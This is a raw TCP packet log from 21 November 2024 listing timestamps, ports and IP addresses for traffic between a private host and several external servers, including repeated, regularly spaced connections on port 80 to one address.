Nov 21, 2024 22:12:32.497123003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.497149944 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.497169971 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.500375032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.500394106 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.500458002 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.500466108 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.500509977 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.504189968 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.504210949 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.504273891 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.504281998 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.504323006 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.507435083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.507456064 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.507522106 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.507529020 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.507572889 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.674645901 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.674664974 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.674753904 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.674772024 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.674818993 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.678597927 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.678612947 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.678678989 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.678684950 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.678725004 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.681760073 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.681773901 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.681847095 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.681854010 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.681916952 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.684964895 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.684981108 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.685046911 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.685053110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.685094118 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.688931942 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.688949108 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.689017057 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.689023018 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.689063072 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.692188978 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.692203045 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.692265987 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.692271948 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.692312956 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.696115017 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.696130037 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.696196079 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.696203947 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.696249008 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.699383020 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.699426889 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.699469090 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.699475050 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.699506998 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.699527025 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.866535902 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.866586924 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.866689920 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.866720915 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.866758108 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.866780043 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.869993925 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.870011091 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.870085955 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.870094061 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.870143890 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.874005079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.874021053 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.874093056 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.874100924 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.874145985 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.877194881 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.877209902 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.877271891 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.877279997 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.877322912 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.881159067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.881172895 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.881239891 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.881247044 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.881290913 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.884356022 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.884370089 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.884430885 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.884438038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.884480953 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.888299942 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.888329983 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.888394117 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.888411045 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.888453960 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.891701937 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.891716003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.891791105 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:32.891801119 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:32.891860008 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.059019089 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:33.059070110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:33.059199095 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.059218884 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:33.059246063 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.059274912 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.062695980 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:33.062740088 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:33.062787056 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.062794924 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:33.062829971 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.062860966 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.063030005 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:33.063087940 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.063093901 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:33.063143969 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.063174963 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.063205004 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:33.063214064 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:33.063254118 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:35.783911943 CET	49818	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:35.784223080 CET	49880	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:35.903728008 CET	80	49880	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:35.903759003 CET	80	49818	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:35.906927109 CET	49818	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:35.906992912 CET	49880	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:35.907192945 CET	49880	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:36.026648045 CET	80	49880	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:37.300508022 CET	80	49880	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:37.303034067 CET	49880	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:39.042876959 CET	49880	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:39.043186903 CET	49889	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:39.162983894 CET	80	49889	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:39.163027048 CET	80	49880	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:39.163124084 CET	49880	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:39.163146019 CET	49889	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:39.184993029 CET	49889	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:39.304621935 CET	80	49889	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:40.557570934 CET	80	49889	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:40.557678938 CET	49889	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:41.205214977 CET	49896	443	192.168.2.5	172.67.75.163
Nov 21, 2024 22:12:41.205240011 CET	443	49896	172.67.75.163	192.168.2.5
Nov 21, 2024 22:12:41.205334902 CET	49896	443	192.168.2.5	172.67.75.163
Nov 21, 2024 22:12:41.206154108 CET	49896	443	192.168.2.5	172.67.75.163
Nov 21, 2024 22:12:41.206166029 CET	443	49896	172.67.75.163	192.168.2.5
Nov 21, 2024 22:12:42.078457117 CET	49889	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:42.078787088 CET	49899	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:42.198350906 CET	80	49899	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:42.198514938 CET	49899	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:42.198776960 CET	49899	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:42.199497938 CET	80	49889	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:42.199573040 CET	49889	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:42.318347931 CET	80	49899	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:42.483783007 CET	443	49896	172.67.75.163	192.168.2.5
Nov 21, 2024 22:12:42.484635115 CET	49896	443	192.168.2.5	172.67.75.163
Nov 21, 2024 22:12:42.484652042 CET	443	49896	172.67.75.163	192.168.2.5
Nov 21, 2024 22:12:42.486329079 CET	443	49896	172.67.75.163	192.168.2.5
Nov 21, 2024 22:12:42.486469984 CET	49896	443	192.168.2.5	172.67.75.163
Nov 21, 2024 22:12:42.487958908 CET	49896	443	192.168.2.5	172.67.75.163
Nov 21, 2024 22:12:42.488121033 CET	49896	443	192.168.2.5	172.67.75.163
Nov 21, 2024 22:12:43.534687996 CET	80	49899	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:43.534749031 CET	49899	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:45.156443119 CET	49899	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:45.156732082 CET	49906	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:45.276398897 CET	80	49906	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:45.276433945 CET	80	49899	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:45.276489019 CET	49906	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:45.276516914 CET	49899	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:45.276751995 CET	49906	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:45.396629095 CET	80	49906	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:46.711678028 CET	80	49906	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:46.711757898 CET	49906	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:48.224082947 CET	49914	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:48.224083900 CET	49906	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:48.343718052 CET	80	49914	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:48.344103098 CET	49914	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:48.344152927 CET	80	49906	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:48.344736099 CET	49906	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:48.351548910 CET	49914	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:48.471149921 CET	80	49914	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:49.727015018 CET	80	49914	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:49.727085114 CET	49914	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:51.375185013 CET	49914	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:51.375663042 CET	49922	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:51.495202065 CET	80	49914	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:51.495240927 CET	80	49922	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:51.495281935 CET	49914	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:51.495352983 CET	49922	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:51.495536089 CET	49922	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:51.615176916 CET	80	49922	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:52.919346094 CET	80	49922	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:52.919435024 CET	49922	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:54.423069000 CET	49922	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:54.423374891 CET	49930	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:54.542911053 CET	80	49930	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:54.542977095 CET	80	49922	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:54.543010950 CET	49930	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:54.543064117 CET	49922	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:54.543281078 CET	49930	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:54.662815094 CET	80	49930	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:55.885034084 CET	49942	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:55.885092974 CET	443	49942	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:55.885158062 CET	49942	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:55.885366917 CET	49942	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:55.885386944 CET	443	49942	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:55.924493074 CET	80	49930	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:55.924572945 CET	49930	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:56.311594009 CET	49944	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:56.311636925 CET	443	49944	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:56.311717033 CET	49944	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:56.312006950 CET	49944	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:56.312025070 CET	443	49944	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:56.414699078 CET	49945	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:56.414810896 CET	443	49945	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:56.414908886 CET	49945	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:56.415184021 CET	49945	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:56.415220976 CET	443	49945	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:56.535792112 CET	49946	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:56.535837889 CET	443	49946	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:56.535974026 CET	49946	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:56.536516905 CET	49946	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:56.536541939 CET	443	49946	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:57.545706034 CET	49930	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:57.546013117 CET	49950	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:57.852014065 CET	49930	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:57.919967890 CET	80	49930	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:57.920011044 CET	80	49950	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:57.920046091 CET	49930	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:57.920101881 CET	49950	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:57.920293093 CET	49950	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:57.933517933 CET	443	49942	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:57.933754921 CET	49942	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:57.933785915 CET	443	49942	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:57.934891939 CET	443	49942	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:57.934959888 CET	49942	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:57.971506119 CET	80	49930	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:58.040870905 CET	80	49950	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:58.107229948 CET	443	49945	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:58.107506990 CET	49945	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:58.107542038 CET	443	49945	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:58.109035015 CET	443	49945	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:58.109091997 CET	49945	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:58.113806963 CET	443	49944	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:58.114069939 CET	49944	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:58.114084959 CET	443	49944	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:58.117938995 CET	443	49944	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:58.118005037 CET	49944	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:58.227524042 CET	443	49946	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:58.230983019 CET	49946	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:58.230999947 CET	443	49946	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:58.232448101 CET	443	49946	142.250.181.100	192.168.2.5
Nov 21, 2024 22:12:58.232661009 CET	49946	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:12:59.344305992 CET	80	49950	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:59.347018003 CET	49950	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:00.899655104 CET	49950	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:00.899991989 CET	49963	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:01.019711971 CET	80	49963	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:01.019807100 CET	49963	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:01.019869089 CET	80	49950	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:01.019934893 CET	49950	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:01.020077944 CET	49963	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:01.139549017 CET	80	49963	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:04.678618908 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:04.678666115 CET	443	49976	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:04.678720951 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:04.678944111 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:04.678955078 CET	443	49976	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:04.679582119 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:04.679637909 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:04.679708004 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:04.679930925 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:04.679949999 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:04.732981920 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:04.733036041 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:04.733093023 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:04.733961105 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:04.733975887 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:04.813723087 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:04.813817978 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:04.813915968 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:04.814369917 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:04.814404964 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:05.014095068 CET	49963	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:05.432219028 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.432271957 CET	443	49982	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.432336092 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.432749987 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.432797909 CET	443	49983	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.432854891 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.433058977 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.433070898 CET	443	49982	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.433335066 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.433355093 CET	443	49983	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.444808960 CET	49984	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.444840908 CET	443	49984	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.445532084 CET	49984	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.445772886 CET	49984	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.445797920 CET	443	49984	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.946170092 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.947909117 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.947941065 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.948828936 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.948892117 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.951445103 CET	443	49976	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.951508045 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.951617956 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.951848030 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.951855898 CET	443	49976	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.952109098 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.952116966 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.952735901 CET	443	49976	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.952812910 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.953666925 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.953722954 CET	443	49976	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.953795910 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.953803062 CET	443	49976	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.990083933 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.990531921 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.990597010 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.994432926 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.994513035 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.995836973 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:05.996032953 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:05.996095896 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.043342113 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.087450981 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.087502003 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.133857012 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.133886099 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.292383909 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.381011963 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.381092072 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.381222010 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.381712914 CET	49978	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.381730080 CET	443	49978	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.390413046 CET	443	49976	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.390486002 CET	443	49976	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.390528917 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.390763044 CET	49976	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.390770912 CET	443	49976	162.159.61.3	192.168.2.5
